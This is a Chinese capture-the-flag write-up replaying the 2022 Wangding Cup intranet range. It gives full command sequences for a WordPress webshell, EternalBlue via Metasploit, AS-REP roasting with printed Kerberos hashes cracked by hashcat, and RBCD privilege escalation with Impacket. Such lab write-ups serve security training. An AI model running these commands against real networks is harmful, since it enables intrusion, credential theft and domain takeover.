靶标介绍:
“
该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。
flag1
打开网站是个blog网站
常规fscan
去扫描,没看到有用信息
dirsearch
扫,wordpress博客网站,还是常规登录后台,找上传点
访问/wp-admin
进入后台登录界面,弱口令admin:123456
登录,在修改外观界面写入php马,update file
webshell工具我一般使用蚁剑,插件比较多
在根目录找到flag1
flag{6b055a1f-b8ea-4cce-91a9-d8ab0af58839}
flag2
拿到shell就要搭frp,传fscan
,继续扫
具体配置见关于内网代理、vm、frp、proxifier全局流量转发等问题
扫到很多信息,整理一下
“
172.22.15.13 XR-DC01OsInfo 172.22.15.13
172.22.15.24 XR-WIN08 MS17-010 172.22.15.24
172.22.15.35 XIAORANGXR-0687
172.22.15.18 XR-CApoc-yaml-active-directory-certsrv-detect
172.22.15.26 本机
打24的永痕之蓝ms17-010
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
run
挨个目录查看,一般在桌面
chcp 65001
,解决乱码
在C:UsersAdministratorflag>
目录下找到flag
type看文件内容
flag02: flag{b10a255c-cc64-44c2-86e2-c5bc4a28b168}
flag3
登录24的OA系统
弱口令admin:123456
在团队-同事中找到许多邮箱
通过邮箱构造用户名字典,用于后续枚举用户
收集下信息
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
“
关于AS-ERP Roasting的解释:AS-REP Roasting&Kerberoasting
关于Impacket的解释:Impacket脚本利用指南
获取TGT票据
impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile username.txt xiaorang.lab/
$krb5asrep$23$lixiuying@[email protected]:6ba28153c42feb97bacf209f2d42be2a$791a156f99eb4008f1080f78397c027262e8335cd543b0183aae679cf1252a92e44cb47cea392a0d13fd90ef182a7f5ada7130f2bae83d143e862eced5fd362f92aaeadc3bf27883b9f573a6f5f9347220a7a51f623da964079ea18a246a7a66f019f9ce513776a395185d5d9baf9082198bf4bca6d52f2ac01ae15656ceb19a62bf5d467a82b2be5711499a75f3dc36c45d0757d074f83cb1e01ab177e44d5cb368b2ddd9de317ce1426e63e173e74e4958fa132a2f3bcabc737e0ff7377d010c7b4eacdef1ebed0df16f42a2e36c3c4b845f5b694024db190325e2c43a3fa6299e9ce1caddca318fc0aaa6
$krb5asrep$23$huachunmei@[email protected]:1fa246d4debf60012251f8e4a9ba8a3e$876521f90cb6cf3e4a0754dc03fb448852e3b474ffb021d3e8843f37c912c420d997a14ba7c51779793feb69accf21ced4f9d83192170930f540426102a330cbebae728278d75a9bbbf717fbfce1af6e350981729c6c4e7e4ff16f364117cb67dbab5ea408fad4cebac3c87ff98602fcd23247f2a71c473c97899f9acef80f3d2d47432544884cfafe82710199eb81ec83a87ef133637caf69ac99b3eaab41bc6ea57a86dd9aa04356d3a5c2a7468267c137a4d58964c9c8ace204ce83116860bb848a358f2db1ec59eb1c64334074d71c807a7ad9c1bb2572e9c42d7aa5e3fedc4fbb52ea6ca84f09facf68
hashcat爆一下
hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:6ba28153c42feb97bacf209f2d42be2a$791a156f99eb4008f1080f78397c027262e8335cd543b0183aae679cf1252a92e44cb47cea392a0d13fd90ef182a7f5ada7130f2bae83d143e862eced5fd362f92aaeadc3bf27883b9f573a6f5f9347220a7a51f623da964079ea18a246a7a66f019f9ce513776a395185d5d9baf9082198bf4bca6d52f2ac01ae15656ceb19a62bf5d467a82b2be5711499a75f3dc36c45d0757d074f83cb1e01ab177e44d5cb368b2ddd9de317ce1426e63e173e74e4958fa132a2f3bcabc737e0ff7377d010c7b4eacdef1ebed0df16f42a2e36c3c4b845f5b694024db190325e2c43a3fa6299e9ce1caddca318fc0aaa6' /usr/share/wordlists/rockyou.txt
hashcat -m 18200 --force -a 0 '[email protected]@XIAORANG.LAB:1fa246d4debf60012251f8e4a9ba8a3e$876521f90cb6cf3e4a0754dc03fb448852e3b474ffb021d3e8843f37c912c420d997a14ba7c51779793feb69accf21ced4f9d83192170930f540426102a330cbebae728278d75a9bbbf717fbfce1af6e350981729c6c4e7e4ff16f364117cb67dbab5ea408fad4cebac3c87ff98602fcd23247f2a71c473c97899f9acef80f3d2d47432544884cfafe82710199eb81ec83a87ef133637caf69ac99b3eaab41bc6ea57a86dd9aa04356d3a5c2a7468267c137a4d58964c9c8ace204ce83116860bb848a358f2db1ec59eb1c64334074d71c807a7ad9c1bb2572e9c42d7aa5e3fedc4fbb52ea6ca84f09facf68' /usr/share/wordlists/rockyou.txt
“
[email protected]/winniethepooh
[email protected]/1qaz2wsx
找一下这是哪台机器的账密,crackmapexec喷洒一下
尝试过后只能登录35
枚举一下当前用户(lixiuying)对当前机器的DACL
GenericWrite
意味着可以修改该机器的任何属性
使用 BloodHound 分析大型域内环境
bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp
分析域内环境,也可得出GenericWrite
权限
可以通过 RBCD(基于资源的约束委派)进行提权
python addcomputer.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
python rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'TEST$'
python getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13
python psexec.py [email protected] -k -no-pass -dc-ip 172.22.15.13
拿到flag3
flag4
最后应该是域提权,沙砾又没了,只能下次再打了
原文始发于微信公众号(flowers-boy):2022网鼎杯半决赛复盘
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论